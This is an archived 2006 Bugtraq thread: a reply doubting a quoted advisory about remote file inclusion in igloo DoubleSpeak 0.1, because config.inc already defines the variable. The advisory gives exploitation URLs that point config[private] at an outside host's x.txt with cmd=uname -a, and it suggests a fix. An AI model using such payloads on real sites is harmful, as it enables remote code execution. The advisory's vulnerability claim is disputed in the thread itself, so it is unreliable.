lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 12 Jun 2006 12:56:22 -0500
From: str0ke <str0ke@...w0rm.com>
To: "aminrayden@...oo.com" <aminrayden@...oo.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: igloo DoubleSpeak v 0.1 Multiple remote file inclusion


R@...N,

require "config.inc";  contains   'private' =>
'/www/mrpenguin.org/devel/private',

So this shouldn't be vulnerable.  Missing something?

/str0ke

On 11 Jun 2006 20:47:48 -0000, aminrayden@...oo.com
<aminrayden@...oo.com> wrote:
> igloo DoubleSpeak v 0.1 Multiple remote file inclusion
>
> -----------------------------------------------------
>
> Aria-security.com advisory
>
> Bug Discovered by R@...N (amin emami)
>
> Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt
>
> email:AminRayden@...oo.com
>
> Date:12/06/2006
>
> -----------------------------------------------------
>
> Affected software description:
>
> IGLOO DoubleSpeak <= 0.1
>
> Vendor:http://sourceforge.net/projects/iglooweb/
>
> Vulnerability:Multiple remote file inclusion
>
> -----------------------------------------------------
>
> Summary:
>
> DoubleSpeak, formerly known as the Igloo Weblog,
>
> aims to be the easiest to use and most customizable CMS (content management system) on the Internet.
>
> -----------------------------------------------------
>
> Vulnerable code:
>
> require "config.inc";
>
>
>
> require "$config[private]/local.inc";
>
> -----------------------------------------------------
>
> Proof of concept:
>
> The problem exists is in the below files when used the variable $config[private]  in a require() function without being Declared
>
> index.php
>
> faq.php
>
> hardware.php
>
> ianal.php
>
> links.php
>
> login.php
>
> logout.php
>
> new_stories.php
>
> old.php
>
> poll.php
>
> rtfm.php
>
> software.php
>
> TODO.php
>
> /admin/add_links.php
>
> /admin/add_story.php
>
> /admin/add_poll.php
>
> /admin/index.php
>
> /admin/view_story_queue.php
>
> /ui/create_acct.php
>
> /ui/submit_story.php
>
> /ui/suggest_poll.php
>
> /ui/suggest_topic.php
>
> /ui/vote_on_polls.php
>
> -----------------------------------------------------
>
> Exploitation example:
>
> http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a
>
> ...
>
>
> -----------------------------------------------------
>
> Fix:
>
> turn off register_globals and add this code before vulnerable code
>
> $config[private] = "./";
>
>
> ===========================
>
> Aria Security Research
>
> Http://www.aria-security.net
>
>
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ